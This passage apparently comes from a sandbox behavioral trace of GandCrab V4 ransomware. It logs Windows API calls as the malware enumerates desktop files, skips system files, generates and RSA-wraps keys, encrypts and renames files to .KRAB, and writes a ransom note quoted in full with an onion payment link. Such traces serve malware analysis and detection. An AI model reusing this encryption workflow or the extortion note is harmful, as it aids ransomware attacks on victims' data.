"c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\wh1o8nyfpk\\sjx2sck2m.gif.krab")) returned 1 [0086.975] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.976] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0086.976] FindClose (in: hFindFile=0x10234f8 | out: hFindFile=0x10234f8) returned 1 [0086.976] CloseHandle (hObject=0x474) returned 1 [0086.977] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0086.977] FindClose (in: hFindFile=0x10231f8 | out: hFindFile=0x10231f8) returned 1 [0086.977] CloseHandle (hObject=0x3a8) returned 1 [0086.978] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0086.978] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0086.978] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0086.978] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock" [0086.978] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.978] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 63 [0086.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\d2ca4a08d2ca4dee3d.lock") returned 58 [0086.978] lstrlenW (lpString=".lock") returned 5 [0086.978] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.979] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.979] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.979] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.979] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0086.979] lstrcmpW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2=".") returned 1 [0086.979] lstrcmpW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="..") returned 1 [0086.979] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="dl07LM3q8htlCmk8T.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a" [0086.979] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.980] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a.KRAB") returned 61 [0086.980] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a") returned 56 [0086.980] lstrlenW (lpString=".m4a") returned 4 [0086.980] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.980] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0086.980] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a") returned 56 [0086.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a") returned 56 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="desktop.ini") returned 1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="autorun.inf") returned 1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="ntuser.dat") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="iconcache.db") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="bootsect.bak") returned 1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="boot.ini") returned 1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="ntuser.dat.log") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="thumbs.db") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="ntldr") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="NTDETECT.COM") returned -1 [0086.981] lstrcmpiW (lpString1="dl07LM3q8htlCmk8T.m4a", lpString2="Bootfont.bin") returned 1 [0086.981] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.981] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0086.983] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.983] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.984] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.984] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0086.984] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0086.984] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.984] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011700) returned 1 [0086.986] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.986] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.986] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.986] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0086.986] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.987] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.987] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011700) returned 1 [0086.988] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10235f8) returned 1 [0086.988] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0086.988] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0086.989] GetLastError () returned 0x0 [0086.989] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.989] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.989] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10110a0) returned 1 [0086.990] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0086.990] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0086.990] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0086.991] GetLastError () returned 0x0 [0086.991] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.991] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0086.991] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\dl07lm3q8htlcmk8t.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0086.995] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.995] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.996] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xd2e2, lpOverlapped=0x0) returned 1 [0087.011] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff2d1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.011] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd2e2, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xd2e2, lpOverlapped=0x0) returned 1 [0087.011] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0087.011] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.173] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.173] CloseHandle (hObject=0x3a8) returned 1 [0087.174] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.174] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\dl07lm3q8htlcmk8t.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\dl07LM3q8htlCmk8T.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\dl07lm3q8htlcmk8t.m4a.krab")) returned 1 [0087.175] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.175] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0087.175] lstrcmpW (lpString1="iH_vS6E", lpString2=".") returned 1 [0087.175] lstrcmpW (lpString1="iH_vS6E", lpString2="..") returned 1 [0087.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\", lpString2="iH_vS6E" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E" [0087.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\" [0087.175] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0087.176] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0087.176] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0087.176] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0087.176] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0087.176] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.176] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.176] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\\\KRAB-DECRYPT.txt") returned 60 [0087.176] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0087.177] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0087.177] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0087.178] CloseHandle (hObject=0x3a8) returned 1 [0087.178] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.178] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.178] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x22, wMilliseconds=0x17a)) [0087.179] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.179] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0087.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0087.179] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock") returned 66 [0087.179] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\ih_vs6e\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0087.180] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.180] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.180] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\") returned 43 [0087.180] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\*" [0087.180] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x1022ff8 [0087.180] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.180] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.181] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0087.181] lstrcmpW (lpString1="7jqj01n.xlsx", lpString2=".") returned 1 [0087.181] lstrcmpW (lpString1="7jqj01n.xlsx", lpString2="..") returned 1 [0087.181] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\", lpString2="7jqj01n.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx" [0087.181] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0087.181] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx.KRAB") returned 60 [0087.181] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx") returned 55 [0087.181] lstrlenW (lpString=".xlsx") returned 5 [0087.181] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.182] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0087.182] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx") returned 55 [0087.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\iH_vS6E\\7jqj01n.xlsx") returned 55 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="desktop.ini") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="autorun.inf") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="ntuser.dat") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="iconcache.db") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="bootsect.bak") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="boot.ini") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="ntuser.dat.log") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="thumbs.db") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="KRAB-DECRYPT.html") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.182] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="ntldr") returned -1 [0087.183] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="NTDETECT.COM") returned -1 [0087.183] lstrcmpiW (lpString1="7jqj01n.xlsx", lpString2="Bootfont.bin") returned -1 [0087.183] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0087.183] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010b50) returned 1 [0087.184] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0087.185] 